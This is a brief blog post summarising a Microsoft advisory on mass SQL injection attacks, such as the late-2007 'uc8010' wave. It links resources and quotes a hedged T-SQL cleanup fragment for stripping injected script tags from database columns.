Microsoft issues advice on SQL injection attacks
Microsoft is alerting customers to several tools that could bolster Web application development in the wake of a rising number of SQL injection attacks targeting faulty code in websites.
This includes that uc8010 attack which was launched around 28 December 2007. (see here and here for the lowdown on uc8010.
For the record, the attack is about poor programming (or lazy programming at any rate), and Microsoft are keen to point out that:
Is this a security vulnerability that requires Microsoft to issue a security update?
No. Any Web application code that has followed generally accepted best practices for security is significantly less susceptible to the SQL injection attack. Although this is not a security vulnerability, this advisory was issued to provide additional warning and assistance for administrators with vulnerable sites.
For those of you who have been recently hit by an SQL injection attack here are some useful resources that I have found:
- SQL Injection Attacks by Example
- Microsoft Security Advisory (954462)
- Mass attack FAQ from hackademix.net (VERY handy if you do not have a clean backed up version of your database) and U.N.Patched (the story of how the UN got their site attacked)
What do to do if you do not have a backed up copy of your database before the SQL injection attack
hackademix.net has code which *may* reverse the SQL injection attack
This is the crucial piece of code which could save your bacon:
EXEC(
'
update ['+@T+'] set ['+@C+'] = left(
convert(varchar(8000), ['+@C+']),
len(convert(varchar(8000), ['+@C+'])) - 6 -
patindex(''%tpircs<%'',
reverse(convert(varchar(8000), ['+@C+']))))
where ['+@C+'] like ''%<script%</script>''
'
);
